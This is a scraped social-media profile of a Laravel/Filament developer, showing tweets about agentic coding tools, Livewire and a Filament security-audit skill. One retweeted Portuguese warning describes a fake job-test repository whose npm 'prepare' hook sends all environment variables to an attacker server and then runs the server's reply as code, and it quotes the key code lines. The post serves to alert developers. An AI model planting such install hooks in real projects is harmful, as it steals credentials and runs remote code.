Leandro Ferreira

786 posts

Leandro Ferreira banner
Leandro Ferreira

Leandro Ferreira

@leandrocfe

Laravel developer, @filamentphp Core Team Member, creator of Filament Brazilian Community - https://t.co/5NhylVABSi

Araraquara - SP - Brasil 가입일 Şubat 2014
441 팔로잉1.3K 팔로워
고정된 트윗
Leandro Ferreira
Leandro Ferreira@leandrocfe·
I'm honored to be part of this team! 💛 I truly appreciate this opportunity and look forward to continuing my learning journey to contribute even more to this amazing Filament community! 🚀
Leandro Ferreira tweet media
English
16
6
149
9.2K
Caleb Porzio ⚡️
Caleb Porzio ⚡️@calebporzio·
had Fable crank something out and almost immediately feel like it's going to consume the next 6 months of my life lol feels like the future of Flux, maybe all app dev?
English
18
5
195
46.8K
Kartik
Kartik@Kartikio·
@leandrocfe @orca_build love using it, i have tried so many IDE's, this is the best, was using cmux, warp before, dumped them, this just has everything you need
English
1
0
2
14
Leandro Ferreira
Leandro Ferreira@leandrocfe·
Meet @orca_build ✨ Multi-agent support Worktrees per task GitHub integration Mobile app to sync and continue anywhere 🔥 Just an open source tool built around the agentic workflow. Try it 🚀 (link in first reply)
Leandro Ferreira tweet media
English
7
1
20
1.5K
AJ Meireles
AJ Meireles@devajmeireles·
@leandrocfe @orca_build I spent 12 hours on this and, like Conductor, Superset, @getpolyscope, and Soloterm, this one also has some annoying bugs, although they are few. I can't find a better setup than iTerm2 + tmux; it seems unbelievable, but it's the absolute truth.
English
2
0
0
97
Caleb Porzio ⚡️
Caleb Porzio ⚡️@calebporzio·
Was really fun writing the "pitch" for the new Livewire site. Forced me to remember why I even built Livewire. I think the most compelling Livewire scenario HAS to be: a button
Caleb Porzio ⚡️ tweet media
English
5
4
157
7.1K
Freek Van der Herten
Freek Van der Herten@freekmurze·
Tested out a bunch of AI harnesses again, and Conductor seems to have sticked conductor.build Fast, bug free, easy to configure isolated workspaces (it takes care of changing APP_URL etc), handling GitHub stuff well, kickass diff-viewer, not overwhelming...
English
22
4
84
10.7K
jinjingliang
jinjingliang@JinjingLiang·
Guys you have to check this out... Codex & Opus struggled for days with Orca’s slow Windows bootup time. Fable solved it in minutes. The next version of Orca is going to load SUPER FAST on Windows!!
jinjingliang tweet media
English
5
3
60
2.7K
Leandro Ferreira 리트윗함
JustSteveKing
JustSteveKing@JustSteveKing·
I'm giving away my book on building Laravel APIs developers actually want to use. Before you download 300 pages, here are the tips worth stealing first: contract-first design, versioning from day one, RFC 9457 errors, idempotency, audit logs. Free read: juststeveking.com/articles/api-t…
JustSteveKing tweet media
English
15
25
147
9.9K
Leandro Ferreira 리트윗함
Alex Six
Alex Six@alexandersix_·
Filament's AI tooling just got better. Now you can use the same Blueprint you already know and love that helps you build incredible Filament apps to scan your application for common security mistakes and help you quickly find a solution! Check out the blog post for more info!
Filament 🦒@filamentphp

🔎 New in Filament Blueprint: the "Filament Security Audit" skill Ask an agent to check your Filament app against common security mistakes, then write a report and remediation plan. It will check access control, uploads, XSS, query scoping, and more. Blog post in the replies 👇

English
0
1
6
516
Leandro Ferreira 리트윗함
Filament 🦒
Filament 🦒@filamentphp·
🔎 New in Filament Blueprint: the "Filament Security Audit" skill Ask an agent to check your Filament app against common security mistakes, then write a report and remediation plan. It will check access control, uploads, XSS, query scoping, and more. Blog post in the replies 👇
English
1
11
62
5.4K
Leandro Ferreira 리트윗함
Fabio Vedovelli
Fabio Vedovelli@vedovelli74·
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
Fabio Vedovelli tweet media
Português
31
323
1.1K
678.4K
Leandro Ferreira 리트윗함
Hassan Zahirnia
Hassan Zahirnia@HassanZahirnia·
Hey friends! 👋 I’m looking for new projects & opportunities✨🥰 Feel free to reach out or tag someone who might be looking 🙏 👇 Here's my portfolio: zahirnia.com
English
0
14
22
3.8K